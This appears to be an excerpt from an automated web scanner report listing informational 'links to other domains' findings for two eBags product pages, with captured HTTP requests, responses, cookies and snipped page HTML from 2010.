GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:55:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:55:59 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=120830&amp;ipsid=120830_3_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=120830&amp;ipsid=120830_3_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="120830_3_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_3" />
</div>
...[SNIP]...
<a href="/brand/case-logic"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Black " height="55" width="55" class="iconImage skuImage" data-ipsid="120830_1_1" data-skuid="1312638"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_2_1" data-skuid="1312639"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Red" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_3_1" data-skuid="1312640"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&amp;layout=standard&amp;show_faces=true&amp;width=340&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">

<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" />
</span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=120830&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.14. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid= HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=120830&amp;ipsid=120830_2_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=120830&amp;ipsid=120830_2_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="120830_2_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="120830_1_3" />
</div>
...[SNIP]...
<a href="/brand/case-logic"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_202.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Black " height="55" width="55" class="iconImage skuImage" data-ipsid="120830_1_1" data-skuid="1312638"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_2_1" data-skuid="1312639"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="Case Logic Sony PSP&amp;reg; Game Case Red" height="55" width="55" class="iconImage skuImage" data-ipsid="120830_3_1" data-skuid="1312640"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fcase-logic%2fsony-psp-game-case%2f120830&amp;layout=standard&amp;show_faces=true&amp;width=340&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">

<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" />
</span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=120830&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.15. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/carry-on-luggage/20048891
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373793|PC#1293371743230-938821.20#1294581533|check#true#1293371993; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1169; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":3,"to":4.2,"c":"http://www.ebags.com/category/carry-on-luggage/20048891","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1293371932378}; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Bags%252520by%252520eBags%252520%25253A%252520Carry-On%252520Luggage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Febags%25252Fmother-lode-tls-mini-21-wheeled-duffel%25252F125538%25253Fproductid%25253D1325214%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:25 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 91539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=125538&amp;ipsid=125538_3_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=125538&amp;ipsid=125538_3_1" target="_blank"
